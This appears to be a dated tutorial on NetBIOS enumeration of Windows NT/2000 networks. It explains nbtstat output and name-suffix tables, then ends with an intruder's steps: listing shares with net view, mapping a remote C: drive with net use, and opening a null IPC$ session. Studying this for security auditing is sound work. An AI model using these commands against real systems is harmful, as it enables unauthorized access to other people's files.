Remote Network Penetration via NetBios Hack/Hacking.

These are basic techniques but very useful when penetration testing any Windows based network, the techniques were discovered on WinNT but are still very valid on Windows2000 and in some cases Windows2003 due to backwards compatibility.

This is for educational purpose.

The NBTSTAT command can be used to query network machines concerning NetBIOS information. It can also be useful for purging the NetBIOS cache and preloading the LMHOSTS file. This one command can be extremely useful when performing security audits.

Interpretation the information can reveal more than one might think.

Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]

Switches
   -a    Lists the remote computer's name table given its host name.
   -A    Lists the remote computer's name table given its IP address.
   -c    Lists the remote name cache including the IP addresses.
   -n    Lists local NetBIOS names.
   -r    Lists names resolved by broadcast and via WINS.
   -R    Purges and reloads the remote cache name table.
   -S    Lists sessions table with the destination IP addresses.
   -s    Lists sessions table conversions.

The column headings generated by NBTSTAT have the following meanings:

Input
     Number of bytes received.
Output
     Number of bytes sent.
In/Out
     Whether the connection is from the computer (outbound)
     or from another system to the local computer (inbound).
Life
     The remaining time that a name table cache entry will "live"
     before your computer purges it.
Local Name
     The local NetBIOS name given to the connection.
Remote Host
     The name or IP address of the remote host.
Type
     A name can have one of two types: unique or group.
     The last byte of the 16 character NetBIOS name often
     means something because the same name can be present
     multiple times on the same computer. This shows the last
     byte of the name converted into hex.
State
     Your NetBIOS connections will be shown in one of the
     following "states": 

State                   Meaning

Accepting  :     An incoming connection is in process.

Associated:     The endpoint for a connection has been created
                      and your computer has associated it with an IP
                      address.

Connected:     This is a good state! It means you're connected
                       to the remote resource.

Connecting:    Your session is trying to resolve the name-to-IP
                       address mapping of the destination resource.

Disconnected: Your computer requested a disconnect, and it is
                        waiting for the remote computer to do so.

Disconnecting: Your connection is ending.

Idle:              The remote computer has been opened in the current
                     session, but is currently not accepting connections.

Inbound:        An inbound session is trying to connect.

Listening:      The remote computer is available.

Outbound:     Your session is creating the TCP connection.

Reconnecting: If your connection failed on the first attempt,
                          it will display this state as it tries to reconnect.

Here is a sample NBTSTAT response of my NT Box:

C:\>nbtstat -A 195.171.236.139

       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
MR_B10NDE      <00>  UNIQUE      Registered
WINSEKURE LABS <00>  GROUP       Registered
MR_B10NDE      <03>  UNIQUE      Registered
MR_B10NDE      <20>  UNIQUE      Registered
WINSEKURE LABS <1E>  GROUP       Registered

MAC Address = 44-45-53-54-00-00

Using the table below, what can you learn about the machine?

Name            Number        Type        Usage
=========================================================================
    00        U        Workstation Service
    01        U        Messenger Service
<\\_MSBROWSE_>    01        G        Master Browser
    03        U        Messenger Service
    06        U        RAS Server Service
    1F        U        NetDDE Service
    20        U        File Server Service
    21        U        RAS Client Service
    22        U        Exchange Interchange
    23        U        Exchange Store
    24        U        Exchange Directory
    30        U        Modem Sharing Server Service
    31        U        Modem Sharing Client Service
    43        U        SMS Client Remote Control
    44        U        SMS Admin Remote Control Tool
    45        U        SMS Client Remote Chat
    46        U        SMS Client Remote Transfer
    4C        U        DEC Pathworks TCPIP Service
    52        U        DEC Pathworks TCPIP Service
    87        U        Exchange MTA
    6A        U        Exchange IMC
    BE        U        Network Monitor Agent
    BF        U        Network Monitor Apps
    03        U        Messenger Service
    00        G        Domain Name
    1B        U        Domain Master Browser
    1C        G        Domain Controllers
    1D        U         Master Browser
    1E        G        Browser Service Elections
    1C        G        Internet Information Server
 00        U        Internet Information Server
    [2B]        U        Lotus Notes Server
IRISMULTICAST    [2F]        G        Lotus Notes
IRISNAMESERVER    [33]        G        Lotus Notes
Forte_$ND800ZA    [20]        U        DCA Irmalan Gateway Service

Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.

Group (G): A normal group; the single name may exist with many IP addresses.

Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.

Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.

Domain Name (D): New in NT 4.0.

An intruder could use the table above and the output from an nbtstat against your machines to begin gathering information about them. With this information an intruder can tell, to an extent, what services are running on the target machine and sometimes what software packages have been installed. Traditionally, every service or major software package comes with it’s share of vulnerabilities, so this type of information is certainly useful to an intruder.

The next step for an intruder would be to try and list the open shares on the given computer, using the net view command, Here is an example of the net view command used against my box with the open shares C:\ and C:\MP3S\

C:\>net view \\195.171.236.139
Shared resources at \\195.171.236.139

Sharename    Type         Comment
-----------------------------------------------------------------
C            Disk         Drive C:\
MP3S         Disk         My collection of MP3s
The command was completed successfully.

This information would give the intruder a list of shares which he would then use in conjunction with the net use command, a command used to enable a computer to map a share to it’s local drive, below is an example of how an intruder would map the C Share to a local G: drive which he could then browse:

C:\>net use G: \\195.171.236.139\C
The command was completed successfully.

C:\>G:

G:\>

To connect to the IPC$ share as null, an intruder would issue the following command from a command prompt:

c:\>net use \\[ip address of target machine]\ipc$ "" /user:""